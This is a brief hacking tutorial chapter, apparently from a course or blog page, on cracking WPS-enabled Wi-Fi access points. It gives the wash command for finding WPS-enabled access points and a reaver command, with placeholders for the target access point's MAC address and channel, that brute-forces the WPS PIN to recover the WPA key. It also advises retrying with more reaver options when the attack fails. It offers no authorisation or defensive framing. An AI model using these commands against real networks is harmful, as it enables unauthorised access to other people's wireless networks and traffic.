NETWORK HACKING CHAPTER : 12

CRACKING WPS ENABLED ACCESS POINTS

 We shall use a tool called wash to scan for WPS enabled AP's

> wash -i [interface]

Then we are going to use a tool called reaver to brute force the WPS ping and
calculate the WPA key

> reaver -i [interface] -b [TARGET AP MAC] -c [TARGET CHANNEL] -vv
some times there is chance for this attack to fail so just type reaver --help to add more option for performing anouther accurate attack.

Comments